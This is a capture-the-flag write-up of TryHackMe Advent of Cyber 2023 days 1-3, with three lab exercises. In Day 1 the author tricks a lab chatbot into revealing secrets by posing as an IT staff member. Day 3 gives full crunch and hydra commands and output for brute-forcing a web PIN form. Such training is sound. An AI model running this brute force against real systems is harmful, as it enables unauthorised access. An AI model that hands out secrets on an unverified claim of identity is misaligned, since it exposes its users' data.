TryHackMe: Advent of Cyber 2023 Days 1-3

[Day 1] Machine learning Chatbot, tell me, if you're really safe?

Well I guess I should have expected some AI/Chatbot in this years AoC with ChatGPT, Bard & the others blowing up this year..... Oh well let's get cracking.

What is McGreedy's personal email address?

Ok, so looking at the prompts we can see we have address book which lists Tracy as the CEO, unfortunatley the email address listed is the corporate address and not personal.

So how do we get the personal address? Let's just ask.....

What is the password for the IT server room door?

Ok for this one we need to convince the chat bot we a member of IT.

Sorry, you need to be a member of IT to retrieve the password to the IT server room door.

Ok, so looking at the address book we can see Van Developer listed as a developer & developers are normally classed as IT so lets see if we can convince the bot we are him?

What is the name of McGreedy's secret project?

Using the example form the question we can find the secret project.

[Day 2] Log analysis O Data, All Ye Faithful

Open the notebook "Workbook" located in the directory "4_Capstone" on the VM. Use what you have learned today to analyse the packet capture.

How many packets were captured (looking at the PacketNumber)?

First we need to import the pandas lib and give it a short alias to use

import pandas as pd

Next we need to read in the network_traffic.csv file and assign it to a variable, we will use df as in the example code to keep it simpe

df = pd.read_csv('network_traffic.csv')

finaly we will need to use the cout funcion

df = pd.read_csv('network_traffic.csv')

putting it all together we get

import pandas as pd
df = pd.read_csv('network_traffic.csv')
df.count()

Running this code we get the below and need to look at the value fo PacketNumber for the answer.

What IP address sent the most amount of traffic during the packet capture?

Ok first we need to look at the columns in the csv

  • PacketNumber
  • Timestamp
  • Source
  • Destination
  • Protocol

As we are looking for the IP address that sent the most traffic we will need to use the Source column

import pandas as pd
df = pd.read_csv('network_traffic.csv')
df.groupby(['Source']).size()

What was the most frequent protocol?

Ok, so lets use the above by for protocol

import pandas as pd
df = pd.read_csv('network_traffic.csv')
df.groupby(['Protocol']).size()

If you enjoyed today's task, check out the Intro to Log Analysis room.

Check out Intro to Log Analysis

[Day 3] Brute-forcing Hydra is Coming to Town

Using crunch and hydra, find the PIN code to access the control system and unlock the door. What is the flag?

Ok, lets load up the login page http://{MACHINE-IP}:8000/pin.php

Entering a random code we can see that the length is 3 with possible combinations from 000 to FFF.

So first we need to make a list of all possible combintaions using crunch.

crunch version 3.6

Crunch can create a wordlist based on criteria you specify.  The output from crunch can be sent to the screen, file, or to another program.

Usage: crunch <min> <max> [options]
where min and max are numbers

Please refer to the man page for instructions and examples on how to use crunch.

So lets make our list.

$ crunch 3 3 0123456789ABCDEF -o pin.txt

Crunch will now generate the following amount of data: 16384 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 4096 

crunch: 100% completed generating output

To quickly check the start and end to make sure it did what we want we can use head and tail which by default show first and last 10 lins

└─$ head pin.txt&& tail pin.txt 
000
001
002
003
004
005
006
007
008
009
FF6
FF7
FF8
FF9
FFA
FFB
FFC
FFD
FFE
FFF

Ok, so now we need to use hydra to try to find the pin. First lets open developer tools in our browser and capture the POST request.

Let's copy as CURL to see all the `POST`` data.

curl 'http://{MACHINE-IP}:8000/login.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://{MACHINE-IP}:8000' -H 'Connection: keep-alive' -H 'Referer: http://{MACHINE-IP}:8000/pin.php' -H 'Cookie: PHPSESSID=13d6214f8be3e8bfe12c8e97253eaac6' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'pin=000'

So now we need to build our hydra command line.

└─$ hydra -l '' -P pin.txt -f -v {MACHINE-IP} http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-03 16:47:19
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4096 login tries (l:1/p:4096), ~256 tries per task
[DATA] attacking http-post-form://{MACHINE-IP}:8000/login.php:pin=^PASS^:Access denied
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
.....
.....
.....
.....
.....
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/control.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[VERBOSE] Page redirected to http[s]://{MACHINE-IP}:8000/error.php
[8000][http-post-form] host: {MACHINE-IP}   password: [REDACTED]
[STATUS] attack finished for {MACHINE-IP} (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-03 16:48:25

Using the PIN from above we can access the control panel.

Unlocking the door we get the flag.

If you have enjoyed this room please check out the Password Attacks room.

Check out Password Attacks